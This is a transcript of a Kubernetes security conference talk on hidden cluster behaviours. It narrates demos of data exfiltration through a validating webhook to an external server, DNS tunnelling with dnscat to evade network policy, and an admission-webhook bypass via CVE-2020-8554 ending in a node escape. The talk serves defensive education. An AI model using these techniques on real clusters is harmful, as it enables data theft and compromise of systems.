 My name is Kat Cosgrove, I am your moderator for this session, and this is Kubernetes Exposed Seven of Nine Hidden Secrets that will give you pause, presented by the incomparable Ian Coldwater of Twilio and Brad Giesemann of Aqua Security. Just a reminder, please hold your questions until after the session is over, then you can raise your hand and I will come find you with a microphone, or you can ask in the meeting play app. Enjoy the talk. Hi everybody, can you hear me? Yep. Y'all in the back too? Sounds good. Fabulous. Okay. Hi! Welcome to Kubernetes Exposed Seven of Nine Hidden Secrets that will give you pause. If you are in the room for another talk, you are in the wrong room, and that's okay, we can hang out anyway. My name's Ian Coldwater. I am co-chair of Kubernetes Security, and I have container things. Hi, I'm Brad. I'm the director of Cloud Security at Aqua Security, and I also hack container things. If you're new to Kubernetes, you may have noticed some things along your way that make you go, hmm, some unexpected behaviors, maybe some weird surprises. If this sounds familiar to you, you're not alone. We've been working with Kubernetes for a while now, and we've seen a lot of strange behaviors. Wild surprises, unexpected gotchas, things that don't always work the way you think they will. And frankly, there are a lot of things that you might not be aware of that you might not need to know. So today, we figured we'd share some of those with you. Grab your popcorn and your 3D glasses, and let's explore some of the hidden secrets, weird science, and fun twists and turns in the land of Kubernetes. Watch out for jump scares. So here's a quick one. You might think that since Kubernetes heavily uses PKI for authentication that there would be a way to revoke a specific certificate if one of the certificate pairs ever got compromised. That would be sensible, right? That seems like that would make sense, but that's not actually how that works. OACSP stapling is not supported. This is a long time issue in Kubernetes, like, no, literally, a long time issue. There is a Kubernetes issue from 2015 about this specifically. So wait, really, what do you have to do then when your cluster gets popped? Well, to be completely safe, you have to rebuild the entire CA chain and redistribute new certificates everywhere. So wait a second, won't that take down the entire cluster? Sure will. Some managed providers will help you with this, but even if they do, it almost is always going to need some downtime. So it's an important thing to be aware of and to be prepared for. Here's another one. Docker has a solid default set-comp profile for containers. They restrict capabilities in a really smart way. Greats to Jeff's for that awesome work. Since Docker builds containers and Kubernetes orchestrates containers, you might think that Kubernetes would inherit those capabilities out of the box, right? Right, because doesn't Kubernetes just leverage the run times profile by default, I mean, right? I mean, that would be sensible, but it's not actually how it works. Kubernetes overrides Docker's default set-comp profiles, and it makes it unconfined. What this means for people who are not Linux security nerds in the room is that it turns them off. All of those capabilities that Docker very sensibly restricts, Kubernetes just turns around and puts back on. Wait a second. I thought the default set-comp went alpha in Kubernetes 122, so it's on by default, right? Well, default set-comp is a great founding name, right? We've got default set-comp on by default. That's great. We've been waiting for that forever. Okay, the thing is that it's not actually on by default. You have to turn it on, and not only that, you have to turn it on twice. The cluster administrator or your cloud provider needs to turn that feature flag on since it's an alpha, and even after that feature flag's been turned on, there is a CLI flag that needs to be invoked every single time. If both of those things don't happen, or if they happen incorrectly, that default set-comp is actually default off. Here's another thing you might not be aware of. You might think if you delete a cluster role binding, it's gone, right? That seems like that would be sensible, but it doesn't always work that way. There's one special exception, and it can be a dangerous one. That exception is system masters, which is hard-coded in Kubernetes to be cluster admin. And surprise, even if you delete it, this one sticks around. Because it's hard-coded, you can't actually really get rid of it. If you give out certificate pairs that are a part of system masters, they are always cluster admin. Their permissions won't actually be gone. Even if you delete them. We need to test this one out to be sure. Okay, you can see my screen. Great. So I'm running a kind cluster. So that's running kube-adm under the hood, and it puts that system masters certificate pair in the local kube config. So I'm going to run a fancy command under the hood. I won't bore you with it, but I'm just going to extract and show you that that is what is in the actual certificate. So you see system masters. So I have this credential here locally. If I use this credential to authenticate to the cluster, and I run kube-control-auth, can I list? This is a command that says, what permissions do I have when it comes to RBAC? Very useful. If you look at the top two lines here, you can see star.star and star on the verbs, and star on the non-resource URLs and star on the verbs. Those two lines are basically saying, you were allowed to do anything inside the cluster. All's well and good, right? So let's look at the cluster role binding, named cluster admin. It's kind of confusing. But this is the default cluster role binding. It says that system masters, the group, is bound to cluster admin. That's where the explicit definition of those stars happens. So we're going to go ahead and delete that. Wonder what will happen. So did we lose access for system masters, and we deleted our ability to be system masters? Did we actually delete that? Let's find out. We'll run kube-control-auth, can I list again? The stars are gone. So did we lose that permission? Well, let's just find out. Let's go ahead and recreate that exact same cluster role binding. And those astute viewers out there will know that you shouldn't be able to give yourself permissions that you don't have access to, but you can. There, I'm cluster admin again. And we're going to show that just to prove it. There's no cards up the sleeves. Off can I list, and the stars are back. We are all native stars, but your are back shouldn't be. Thinking of some things that you shouldn't be able to do, but you can, you might think that validating webhooks are good for enforcing policy on resources as they hit the API server, right? But they're good for a lot more than that. They're useful for all kinds of things. For example, they can be a high performance data expiltration tool, sometimes avoiding those pesky network egress charges. So here's how validating webhooks are supposed to work, right? In step one, you have a pod spec, and you submit it to the API server if you're authenticated as the right user in step two. And you have create pod in this case in step three. If you have a validating webhook in step four, what it will do is it'll take that entire pod spec and go send it to another pod. And that pod is in number five. And that pod's job is to look at that spec and say allow or block based on what's in it. Okay, so that's basically how admission control works. So that's how admission control is supposed to work. We can use the way that those things work to make them useful for us as attackers too. So here's one thing we could do. We could set up an external server, maybe one in a different cloud provider, and we can set it up to listen on TLS and log what gets sent to it. Then we could set up a validating webhook configuration that points to it when resources like secrets are created. Yeah, you could embed the data that you want to leak or expiltrate or back up to yourself, right? In the request to create the secret. We know that secrets and config maps can store about a megabyte each. So, and the control plane will use its highly efficient go routines, thanks developers who wrote those, to send that data to the listener. The control plane systems in managed Kubernetes providers don't seem to filter out TCP 443 outbound. And it comes from a VPC that in some cases might not be one that you get billed for. Disclaimer, that's not an officially supported use case. Additional disclaimer, neither of us work for a cloud provider. Anywho, moving on. Let's see that in action. So let's exfiltrate some data. I have very important documents in Latin, about a megabyte of it, 3,400 lines or so, just to give your mind a mental picture of how much that is, the works of Shakespeare in there somewhere. And we have an exfiltrating webhook. And what we've configured here, if you look at the very bottom line, it says we're going to send this to an external server named Hong Kong SH. Whenever a create or an update on a secret happens, so a copy of that secret, if you remember from our previous talk, that was kind of sneaky too, but this is, we're using the secret as a carrier for this data. So we're going to apply that validating webhook configuration, like a good administrator, or not, evil. Okay. We're going to look at that configuration just so that you can see what it looks like. There's some CA bundle things in here. This is basically just showing you that we have every time a secret is touched, we're going to send it to that URL. So what we're going to do is we're going to deploy a pod inside our cluster. And its job, I'll show you in a second. I just want to show you the deployment. Right here at the bottom is to do a loop to simulate our highly efficient exfiltration system. We're going to do a kube control, create secret, and send that one megabyte with every one of those requests. Okay, so I'm going to apply this to the cluster. I'm going to get the pods. We see it's running. Okay, now in the background, it's backing up important data or exfiltrating important data. So let's go over to our external server, SSH into it. And for those NGINX admins out there, you'll recognize the access logs. We're just going to tail those. And as you can see, we're backing up at high speed. Again, I don't know who in the room here might be from GCP. I don't know if those IPs look familiar to you. They might. It's very important to back up your data, you know. So pretty cool. Yeah. You know what? It's very real estate. You know what else we could use for nefarious purposes? Working is designed. DNS. You know the saying, it's always DNS. We've all been there. DNS can cause all kinds of problems. Any pod that needs to communicate with another service needs DNS. So most admins doing the right thing and using network policy still have to poke a hole in for DNS lookups in their firewall rules. And that's actually all an attacker needs for a command and control channel if they compromise a running container. So you see this pod in the red? Without any egress filtering, it can directly communicate with an external server. It's often the default, although not the most secure approach. As a red teamer, DNS is really useful for me. Besides, you know, causing outages, if I have data I need to exfiltrate, a lot of the time I'll need to figure out a way to do that. And sometimes that can be really hard, especially if egress is really locked down. But there's often at least one exception. There's almost always a DNS path outbound. It might not be a direct path outbound, but if you can get onto an internet connected box and get remote code execution on it, you can get data out of it via DNS. One of the ways to do this, to hide your communications, is often within valid DNS traffic, within the lookups. This is called DNS tunneling. And there are tools available that make this really easy to use and challenging for admins to detect reliably at scale. Some Kubernetes admins watching or listening to this might think that this wouldn't apply to their clusters because they have strict network policy in place. Nothing's getting out of there. They're good, right? Well, maybe not so much. Right. Even if all direct outbound access is blocked, we typically have to open up UDP port 53 to the Kube DNS pods in the Kube system namespace because that enables service discovery. That's how things need to work. So we can use DNS tunneling from a pod to an attacker. And we're going to show you how. There it displays. Okay. So on my attacking server, out in the internet, on the public internet, I'm going to SSH to it. And I'm going to run something called DNS cat. Raise your hand if you've ever heard of DNS cat. We've got some DNS tunnelers in the room. Cool. This is our C2. This is what's going to capture all the sessions from our compromised systems. C2 stands for committed control. Thank you. So over here, switching gears, I'm on my cluster that I'm going to compromise. Now for the sake of this, we're going to presume that we've gotten access to this specific pod once it runs in the cluster. So our worldview from an attacker's perspective is, I have a shell on this pod. What things can I connect to and how? And what we're going to do is we're going to use various methods to probe and test that we have egress or outbound access. In this case, we're going to use standard curl, my favorite hacking tool. I know you have those as well. Curl to honk.sh on TCP 443, right? This succeeds. This is, there's no surprises here, okay? We're just validating. We have TCP outbound, but we were talking about DNS, weren't we? So in this same pod, we're going to switch to the DNS cat binary that we've already embedded and deployed to this system. And we're going to reach directly out from this pod inside this cluster, directly out to this C2 server using UDP 53. So it's a direct connection. There's no Mallory in the middle. And it establishes a session just like that. So if we switch back over, now we go back over to our server, you can see it has created a new session. So if I run sessions, you see the number one is added there, that's a new session. So I'm going to interact with it using dash i. It's kind of like a tab and a browser, so we're switching tabs over. And you can see the things that we have access to. Personally, I like running shells. I'm going to run a shell. And again, it sort of spawns another new tab on session two. So we'll control Z out of that. And interact with session two. Cool. Now, entirely via DNS requests, we can run commands on that pod. Okay. This is direct UDP. Okay. Okay. So let's be good administrators and apply some network policy. We have two policies here. And I know they're hard to understand. That's okay. We'll walk through this. The top one says ingress and egress deny everything in the default namespace. So the pod, if you apply just that, we'll be able to communicate with nothing. The second policy right below it pokes that hole for UDP 53 within the private IP space of this cluster. So it can do DNS within the cluster. So let's apply that. It's totally secure. Let's lock it down. Apply security. Okay. Coup control, apply security. Done. Okay. So we're going to go back to that same pod. Now it has that wrapping blanket of a nice network policy only allows DNS to the Coup DNS pods. We're going to try those connections again. So we're going to be on that pod. We're going to try to reach out. And it blocks, right? That's expected. Cool. Just wait five seconds. It's not going to make it. Let's try DNS cat direct mode again. Or again, we're trying to just do UDP 53 straight shot to that server. Not going to work either. We've blocked that successfully. How many people think the job is done? Oh, thank you. I think we know better than that. Let's change it to hostname lookup mode indirect mode, whatever you want to call it. Basically encoding the entire set of tunnels via random hostname DNS requests. It's going to go through Coup DNS to a public DNS server and all the way to our destination. And it still works. And probably looks like pretty normal traffic. All right. We have that command session. Sounds good, right? All right. I guess it really always is DNS. So if we're thinking about wild things that we could potentially do with Kubernetes networking, we've got other options. It isn't just DNS. Have you seen CVE 2020 8554? It's okay if you don't remember. CVE numbers are not terribly human friendly. In this CVE, services that use the external IP configuration can disrupt or redirect traffic within the cluster. External IP services are pretty uncommon, but they're very powerful and they can be very useful. For example, they have a useful ability to modify IP tables. They are literally redirection as a service. So let me explain. You see this pod Yemo, or sorry, the service Yemo. And what it really says is all traffic within the cluster going to this external IP is redirected to the nginx pod on port 80. I'll say that again. All traffic going to an external IP is going to this pod right here. And what namespace are we in? We're in default. We have no special privileges. We're just one service and one namespace, but we can cross all namespaces and modify the routing to that IP with this service. So we can disrupt or redirect traffic within a cluster. Could we also disrupt or redirect traffic out of the cluster? Like make it go somewhere else entirely. Could we do that? Yeah. I mean, we know that important things like validating webhooks rely on services. We could disrupt the traffic from the control plane going to the validating webhooks pods. Huh. So could we like sneak a privileged pod past a validating webhook just by creating a service? Would that work? So remember from before how validating webhooks normally work. When you submit a pod, it reaches out to a trusted pod via TLS to get an allow or a block response. That makes sense. But wait a minute. What if admission control, that admission control pod isn't running or it isn't on the network? Would it still work the same way? That depends. If the configuration is set to fail open after a few seconds of it not responding, it allows the request. So the Fail Your Policy Ignore setting is pretty typical of default settings for webhooks because failing closed might cause even more damage. It might actually cause an outage or block an upgrade. Raise your hand if you've ever blocked with a failing closed. Anyone? Yes, I see some hands. Fantastic. So you know the pain. So if that's the case, we could deploy an external IP service to redirect the traffic from the control plane going to the validating webhook pod to somewhere else entirely. And then we could cause it to fail open. I think that might buy us enough time to get a privileged pop through. I bet that'll work. Let's try it. I hope you all still have some popcorn left. One second. There we go. Okay. I'm going to leave that. So we have a default cluster. This is a separate cluster entirely from the previous demos. And we've installed Coverno from the defaults. Okay. Just Coup Control Apply from the docs straight in. And by default, validating webhooks don't have enforcement policies on, okay? But we want to block privileged pods in this specific case. So what we have to do is submit this policy and change the word audit to enforce. So I'm going to go ahead and apply that. To block privileged pods. So let's do that. Again, we're applying security with good one shot. There we go. Security is very important. So let's test that. We always need to validate these assumptions, right? That's what this whole talk is about, validating these assumptions. So Ian and Duffy brought the Duffy. There you are. Shout out. Brought this to my attention a long time ago. And it's just elegant and brilliant that you can run a privileged pod and in the same breath, basically in a center and escape to the node if you can run a privileged pod. So this is a one-shot escape. It's blocked. It did its job. Hate it when that happens. So are we done? I don't think so. Let's create an external IP service with those pods of the validating webhook. And we're going to get them in the top lines. We're going to get the Coverno service IP and the Coverno pod replica IP. We're going to grab those. We're going to also deploy an Nginx deployment in the default namespace. So I'm just a developer in the default namespace, right? So I don't really have that many permissions, but maybe I can create pods and create services, right? So I'm going to create Nginx and have it listed on port 80. That's important in a second. Then we're going to create a service with the pod IP of Coverno and the service IP of Coverno, such that all traffic in the cluster, remember all traffic, including control plane to the validating webhook traffic, all traffic going to port 9443 gets redirected to port 80 on Nginx. So what's going to happen? Nginx is going to go, I don't know what to do with this and just send back an error, right? The actual attack is kind of interesting. We scale the deployment of Nginx up to two. So we add another Nginx pod. Then we try to submit the privilege pod. Then we scale Nginx up to three. And then we immediately scale it back down to two. Now why would we want to do that? Because we're forcing Kube proxy to reset IP tables and reshuffle things. We're causing chaos and churn in the networking stack to try to increase the chances that we're blocking connections that may have already been passed through the session table. All that to say is we're playing some shenanigans with some IP tables. So let's run this attack. And it's going to go in this loop. And so we're going to create the deployment, make its two replicas, try the privilege pod, three, back to two. And this is going to go on a loop. What I want to show you over here is the logs from the validating webhook pod. So it's just doing its job. It's blocking the privilege pod, right? We're all good, right? It may be. And now we wait. Over on the other end here, we're waiting for this race condition to happen. And race conditions are not really reliable, kind of notoriously, so you don't really know how long they're going to take. So we don't really know how long we're going to do this, so I'm going to talk to you for a minute about race conditions. If you would like to hear me talk more about race conditions and hear Fred talk more about race conditions, come see the talk in this exact room immediately after this one called Exploiting a Slightly Peculiar Volume Configuration where we, with our hacker crewmates, say, honk, exploit a race condition in RunC. What's going on over here, Brad? So we are still trying. Hopefully the administrator hasn't been woken up by this point because I don't know if you get a lot of alerts on privilege pods being blocked, but we have a short window here that we can hopefully hit generally 30 to 90 seconds where this succeeds. So I just wanted to show you what it looks like. We're causing churn. We're purposely telling the service to add and remove replicas from the service endpoint slices, right? So we're just trying to cause it. Can you grab one more? Yes. So this is the attack bar. This is just engine X. We'll see it. There it is. Hold on a second. We're doing a coup control run. So we got to pull the image really quick and then get a shell. So we'll see. And as you can see, Coverno performed a leader election and lost it because of a health check. So Coverno shut down just in this moment. Let me go over here. It's creating. It's promising. Success. Check it out. Now we're rude on the note. It's important to note that this behavior is not unique to Coverno, although we're using them for the demo. We're not picking on them only, at least. It is also any products that use validating web hooks in this manner are also vulnerable to this, including gatekeeper and some vendor products that you have definitely heard of. Anyway. So yeah, now that you've seen what can be done with these, you should probably block or restrict external IP services with admission control policies because as we've seen, external IP services are extremely powerful and can cause a lot of problems on purpose, especially for multi-tenant clusters. Indeed. As we said, Kubernetes is full of unexpected surprises. Things might not quite work the way you think they do. Things might actually be dangerous in the way that they differ from your assumptions. So check your assumptions. Um, it is possible to secure Kubernetes, but in order to get there, you really need to know how it works and not just how you think it works, know how it really works. And you can do it. We believe in you. Here's a list of resources and links for further reading and viewing, and we hope you've had as much fun as we have exploring some of our favorite, interesting behaviors, and maybe a jump scare or two in the fun land of Kubernetes. Yeah, we've had a lot of fun with it, so thanks so much for joining us. Stay safe and keep exploring. Thanks, everybody.